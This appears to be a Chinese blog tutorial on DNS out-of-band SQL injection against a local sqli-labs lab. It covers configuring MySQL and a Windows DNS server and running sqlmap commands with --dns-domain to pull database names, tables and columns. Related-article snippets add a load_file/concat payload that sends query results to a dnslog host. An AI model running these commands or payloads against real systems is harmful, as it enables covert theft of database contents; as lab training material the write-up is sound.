DNS外带注入

最新推荐文章于 2024-05-29 14:50:04 发布
最新推荐文章于 2024-05-29 14:50:04 发布
阅读量641 收藏 1
点赞数
分类专栏: 安全笔记 文章标签: mysql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lml_0916/article/details/126170924
版权

修改mysql的secure_file_priv属性

在我们进入MySQL进行查找的时候,他的值是为null,
在这里插入图片描述
所以需要对他进行修改,在配置文件my.ini中进行配置文件的修改。
在这里插入图片描述
然后以txt的形式将他打开,然后添加一句secure_file_priv=""的记录在mysqldb模块中。
在这里插入图片描述
在这里插入图片描述
修改好后重新启动mysql,然后再次查看,可以看到它的值变成这样就可以了。
在这里插入图片描述

配置dns服务器

1.添加角色:右键角色,选择添加角色

在这里插入图片描述
然后根据弹出来的页面选择下一步

在这里插入图片描述
然后勾选DNS服务器,(因为我安装了一个,所以这个我选的别的进行的演示。),然后点击下一步。
在这里插入图片描述
弹窗出来后选择仍要安装DHCP服务器,然后下一步。
在这里插入图片描述
后面的弹窗也是一直下一步,直到安装可以按了之后,点击安装就可以了。

2.添加正向查找

选中WIN-GNN1,然后选择正向查找区域,右键,选择新建区域。
在这里插入图片描述
然后跳出弹唱就直接选择下一步,就可以,然后默认它的选项选择主要区域,然后点击下一步。
在这里插入图片描述
然后建立一个区域名称,这里就随便写就可以了。
在这里插入图片描述
默认选项,选择下一步
在这里插入图片描述
默认选项,选择下一步
在这里插入图片描述
点击完成就可以了。
在这里插入图片描述
这样正向查找区域就创建成功了。
在这里插入图片描述

3.正向查找建立完毕之后,要对一些配置进行修改。

右键WIN哪个,然后点击属性。
在这里插入图片描述
选择高级,在高级中的服务器选项中有一个禁用递归,如果是勾上的一定要取消,因为服务器就是需要递归来进行转发的,如果勾上了也转发不了了。
在这里插入图片描述
在监视中,将简答查询和递归查询都是要勾上的,一定要使用到递归查询。
在这里插入图片描述
其余的就先不用管了。

4.新建主机

选择刚刚建好的区域名称,然后右键之后,选择新建主机。
在这里插入图片描述
填写主机名称和IP,名称就写的是ns,IP地址为你sqlmap所在虚机的ip地址。
在这里插入图片描述
在创建一个泛解析,ip地址依旧是和刚刚那个一样。
在这里插入图片描述
添加主机之后就创建完成了,然后把win11的虚拟机的dns服务修改为刚刚配置的服务器的ip地址。
在这里插入图片描述
然后使用win11的虚拟机取ping刚刚在服务端设置的域名,
并且在kali中输入tcpdump -n port 53;查看信息返回。
在这里插入图片描述
并且可以看到kali中是有返回信息的。
在这里插入图片描述

5.创建条件转发器

选择条件转发器,然后右键,新建一个条件转发器。
在这里插入图片描述
DNS域的域名可以随便写,但是就不要写和刚刚那个相同的就行。IP地址是匹配的kali的IP地址。
在这里插入图片描述
然后在win11上ping刚刚设置的转发IP就可以了,在kali中观察是否收到了日志。

SQLMap使用外带dns注入。

1.取到数据库
注入并查找到库民
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables

在这里插入图片描述

获取到数据表
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables

在这里插入图片描述

获取user表中的列
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns

在这里插入图片描述

橙栎
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 971
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 634
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
写bat脚本双击执行
qq_35911118的博客
04-08 2886
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
SQL注入DNSLog外带注入
dragon的博客
02-21 2845
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
DNS外带注入SQLMAP
qq_31088019的博客
08-06 592
dns外带数据
dns带外注入
scu_hacker博客
12-20 3025
目录 前言 一、DNS带外注入是什么? 二、dnslog的常见平台 三、实战 1. 联合sql盲注 2.联合xss 3.命令执行 4.xxe和ssrf 总结 参考资料 前言 我们常见的sql注入、xss、xxe、ssrf等web漏洞都会存在无回显的情况,为了更方便的获取到查询的内容,因此有了DNS带外注入。 一、DNS带外注入是什么? DNS即域名解析协议,用于ip和域名之间的相互解析,而dnslog就是记录了你对此域名或者...
sqlmap_dns注入配置方法
KHOST的博客
07-17 775
网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下--dns-domain参数,相关的实战文章要么就写的模糊或者一笔带过,搞的云里雾里(主要是菜,关键还没大佬带)。然后自己参考网上的方法自己重新搞了一遍。 0X00 需要准备的东西,sqlmap、windows盲注一个、两个域名、一台外网服务器。 某次搞事情的时候碰到一个时间盲注,碰巧是台windows的,想起dns注入的方法。 在开始前我准备先用sqlmap的--sql-shell 命令进行dns注入payloa..
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 587
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1458
盲注代替 DNS log即DNS日志,域名解析的记录。
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
MySQL注入Dns 注入
baimaozi008的博客
05-29 1053
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
dns缓存
qq_35543858的博客
01-25 774
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
渗透测试---手把手教你SQL注入(4)--DNSLOG外带注入
weixin_52796034的博客
10-10 894
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
17、注入篇--DNS注入MySQL
WX公众号-小白学安全
04-10 879
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNSDNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库 DNS注入核心是 将盲注变为显错注入 DNS-log ​ DNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
【sql注入dns带外通信实践】
qq_40646572的博客
05-29 932
带外通信技术,通常使用在无法直接利用漏洞获得回显的,但目标确实存在漏洞的情况下使用,通过DNS请求就可以把想获得的数据外带出来。 带外通信使用在sql注入的条件如下: 部分文章介绍带外通信时,提及需要设置 secure_auth=ON并且secure_file_priv=’‘。但我在环境实现时发现,只需要设置下secure_file_priv=’‘即可,当然可能时因为版本的问题。我使用的mysql版本如下: 使用的dnslog是用的ceye平台的,自己个人资料中的标识符中的地址就是dns回显地址。 h
DNS外带数据结合sqlmap
S_cx666的博客
08-09 646
DNS外带数据结合sqlmap
mysql dns注入_SQL 注入-DNS 外带数据
weixin_35123047的博客
02-07 293
参考文章注:外带数据皆为数据库版本信息mysql条件:Windowsmysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv适用于联合注入或堆叠注入具体:利用 mysql (Windows 适用)中的 load_file() 函数select load_file(concat("\\\\",version(),".1ndex.dnslo...
jenkins rce
最新发布
07-25
Jenkins Remote Code Execution (RCE) 是一种安全漏洞,在 Jenkins 中发现的一种远程代码执行攻击的可能性。Jenkins 是一款流行的开源持续集成/持续部署 (CI/CD) 工具,广泛用于自动化软件构建、测试和发布过程。 ### Jenkins RCE 的简述 1. **原理概述**:通常情况下,Jenkins 需要在网络上运行并访问,这意味着它暴露了一个服务端口。如果未正确配置权限控制和身份验证机制,恶意用户可能会通过特定的 HTTP 请求注入恶意脚本或命令,并由 Jenkins 执行,导致远程代码执行。这种攻击利用了服务器的安全配置错误或者存在脆弱的插件和配置设置。 2. **危害**:一旦发生 Jenkins RCE,攻击者可以获取对整个系统的完全控制权,包括但不限于执行任意系统命令、修改文件、安装软件、窃取敏感数据等。这可能导致严重的数据泄露、业务中断以及潜在的长期安全风险。 ### 防止 Jenkins RCE 的措施 1. **更新到最新版本**:定期检查 Jenkins 更新,及时应用官方发布的安全补丁和修复,因为大多数已知的漏洞都会在新版本中得到解决。 2. **权限管理**:限制 Jenkins 用户的访问权限,只赋予其完成任务所需的最少权限。避免使用管理员账户进行 Jenkins 操作,应使用具有有限权限的角色账号。 3. **HTTPS 部署**:启用 HTTPS 能有效防止中间人攻击和其他形式的数据窃取,提高通信安全性。 4. **禁用危险的插件**:评估所有第三方插件及其更新,移除不再需要或已被证实存在安全隐患的插件。 5. **强化输入验证**:对于用户提交的数据,实施严格的输入验证策略,过滤掉恶意字符或脚本,减少潜在的攻击面。 6. **监控日志**:定期审查 Jenkins 日志,以便尽早检测异常活动或可疑操作,有助于快速响应和预防潜在威胁。 7. **教育培训**:加强团队成员对安全最佳实践的理解,确保所有人都了解如何识别和报告潜在的漏洞。 8. **定期审计和渗透测试**:通过外部安全审计和内部渗透测试,定期检查 Jenkins 系统的安全状况,识别并修复潜在的风险点。 通过采取以上措施,可以显著降低 Jenkins 发生 RCE 类型攻击的风险,保护组织的 CI/CD 流程免受恶意攻击的影响。---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值